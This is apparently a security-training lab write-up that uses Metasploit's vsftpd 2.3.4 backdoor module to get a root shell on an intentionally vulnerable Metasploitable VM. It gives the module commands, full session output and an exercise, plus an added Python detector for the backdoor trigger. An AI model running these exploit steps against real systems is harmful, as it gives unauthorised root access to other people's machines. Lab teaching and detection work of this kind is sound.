📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
Part of the Metasploitable Lab Series
Lab 4 of 10 · 40% complete
⚠️ Authorised Lab Only. This lab exploits a real vulnerability against an intentionally vulnerable target. Run only on your isolated Metasploitable VM on a host-only network. Never run Metasploit modules against any system without explicit written authorisation.
Five commands. That’s all it takes. From a blank msfconsole to a root shell on Metasploitable in under 60 seconds using the vsftpd 2.3.4 backdoor. I’m not showing you this because it’s hard — it’s not. I’m showing you this because understanding how a Metasploit module works end-to-end is the foundation for every subsequent module you’ll run. The vsftpd exploit is the simplest possible example of the complete Metasploit workflow. Learn it here, then apply the same five-command structure to every module in the series.
🎯 What You’ll Master in Metasploitable Lab 4
- Navigate msfconsole and understand the module structure
- Run the vsftpd 2.3.4 backdoor module to get a root shell
- Use post-exploitation commands to enumerate the compromised system
- Run a second module — Samba usermap_script — using the same workflow
- Understand the difference between a command shell and a Meterpreter session
⏱️ 35 min · 3 exercises · Lab 4 of 10

#### ✅ Before You Start

- Lab 3 — Service Enumeration — the attack matrix from Lab 3 identified vsftpd 2.3.4 as Critical priority. Today I run the exploit. Have your Metasploitable IP ready from Lab 2.
- Metasploitable 2 running on host-only network · Kali Linux · msfconsole accessible

### 📋 Lab 4 — Metasploit + Metasploitable First Module

1. msfconsole — The Five-Command Workflow
2. vsftpd 2.3.4 Backdoor — Root Shell in 60 Seconds
3. Post-Exploitation — What to Do With Root Access
4. Second Module — Samba usermap_script

Lab 4 is the payoff for Labs 2 and 3. The service enumeration from Lab 3 confirmed vsftpd 2.3.4 with the backdoor present. The full exploitation methodology is in the Ethical Hacking course. Use the Port Scanner Tool to confirm port 21 is open before starting.
msfconsole — The Five-Command Workflow
The five-command structure I use is identical whether I’m on Metasploitable or a real engagement target, and every Metasploit exploit follows it. Learning it on the simplest possible exploit (vsftpd backdoor — no payload selection, no options to configure) means that when you move to complex modules with dozens of options, the structure is already familiar.
THE FIVE-COMMAND METASPLOIT WORKFLOW

```
# Step 1: Launch msfconsole
msfconsole

# Step 2: Select the module
use exploit/unix/ftp/vsftpd_234_backdoor

# Step 3: Configure the target
set RHOSTS TARGET_IP

# Step 4: Verify options
show options

# Step 5: Run the exploit
run

# That's it. Every Metasploit module follows this structure.
# More complex modules add: set LHOST, set PAYLOAD, set PORT
# But the core: use → set RHOSTS → show options → run
```
vsftpd 2.3.4 Backdoor — Root Shell in 60 Seconds
The vsftpd 2.3.4 backdoor is the first exploit I run on every new Metasploitable instance — it confirms the lab is working. It takes under 60 seconds from msfconsole prompt to root shell. The exploit is this simple because the backdoor’s mechanism is this simple: send “:)” in the username field, connect to port 6200.
VSFTPD 2.3.4 EXPLOIT — FULL RUN

```
msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf6 exploit > run
[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root) groups=0(root)
```
msfconsole — vsftpd Root Shell Obtained

```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Command shell session 1 opened (192.168.56.100:45678 -> 192.168.56.101:6200)
id
uid=0(root) gid=0(root) groups=0(root)
```

→ Root access on Metasploitable. Time from msfconsole launch: 47 seconds.
📸 First Metasploit module success — root shell via vsftpd 2.3.4 backdoor. The output sequence: banner confirmation (vsFTPd 2.3.4), backdoor trigger confirmation, UID verification (uid=0 = root), and session opened on port 6200 (the backdoor’s command shell port). The session is a basic command shell, not Meterpreter — it’s fully functional but lacks the advanced post-exploitation features. Running id confirms root access. From here: the entire Metasploitable filesystem is accessible without further privilege escalation.
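Viewed from the defending side, the mechanism above leaves two correlated events: an FTP username containing “:)” and a connection to port 6200 on the same host. The following added example (not part of the original article) flags that pair in constructed sample events; the event format, the names `FTP_USER` and `TCP_CONN`, and the 30-second window are assumptions.

```python
"""Added example: correlate the two observable steps of the vsftpd 2.3.4 backdoor."""
from collections import namedtuple

TRIGGER = ":)"        # username marker named in the article
BACKDOOR_PORT = 6200  # shell port named in the article
WINDOW = 30.0         # assumed correlation window in seconds

# Constructed sample events in an assumed sensor format (not real tool output):
# <epoch> <src_ip> <dst_ip> <dst_port> <event> <detail>
SAMPLE_LOG = """\
1700000000.10 192.168.56.100 192.168.56.101 21 FTP_USER anonymous
1700000001.20 192.168.56.100 192.168.56.101 21 FTP_USER lab:)
1700000001.90 192.168.56.100 192.168.56.101 6200 TCP_CONN -
1700000050.00 192.168.56.102 192.168.56.101 6200 TCP_CONN -
1700000060.00 192.168.56.100 192.168.56.101 21 FTP_USER smile:)
this line is malformed and is skipped
"""

Alert = namedtuple("Alert", "severity server client reason")

def parse(line):
    """Return (ts, src, dst, dport, event, detail), or None if malformed."""
    try:
        ts, src, dst, dport, event, detail = line.split(maxsplit=5)
        return float(ts), src, dst, int(dport), event, detail
    except ValueError:
        return None

def detect(log_text, window=WINDOW):
    events = sorted(e for e in map(parse, log_text.splitlines()) if e)
    triggers, alerts = [], []  # trigger = [ts, client, server, followed_up]
    for ts, src, dst, dport, event, detail in events:
        if event == "FTP_USER" and TRIGGER in detail:
            triggers.append([ts, src, dst, False])
        elif event == "TCP_CONN" and dport == BACKDOOR_PORT:
            # Correlate on the server only: the listener opens on the FTP host.
            for trig in triggers:
                if trig[2] == dst and 0 <= ts - trig[0] <= window:
                    trig[3] = True
                    alerts.append(Alert("high", dst, src,
                        f"port {BACKDOOR_PORT} connection after trigger username"))
                    break
    alerts += [Alert("medium", dst, src, "trigger username, no follow-up seen")
               for _, src, dst, followed in triggers if not followed]
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A "high" alert means both steps were seen against one server; "medium" means only the trigger username was seen, which is still worth triaging on any host running vsftpd 2.3.4.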
⚡ EXERCISE 1 — KALI TERMINAL (15 MIN · METASPLOITABLE RUNNING)
Run the vsftpd Module — Get Your First Root Shell
⏱️ 15 minutes · msfconsole
Run the five-command sequence exactly as shown. The goal: root shell confirmed with id output showing uid=0. Screenshot it. This is the moment Metasploit becomes a tool you’ve used, not just read about.
```
# Step 1: Launch msfconsole
msfconsole -q
# Wait for: msf6 >

# Step 2: Select module
use exploit/unix/ftp/vsftpd_234_backdoor
# Prompt changes to: msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

# Step 3: Set target
set RHOSTS [YOUR_METASPLOITABLE_IP]
# Confirm: RHOSTS => [IP]

# Step 4: Review options
show options
# Confirm RHOSTS is set. Is RPORT default 21?

# Step 5: Run it
run
# Watch the output. Look for:
# [+] Backdoor service has been spawned
# [+] UID: uid=0(root)
# [*] Command shell session opened
```
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
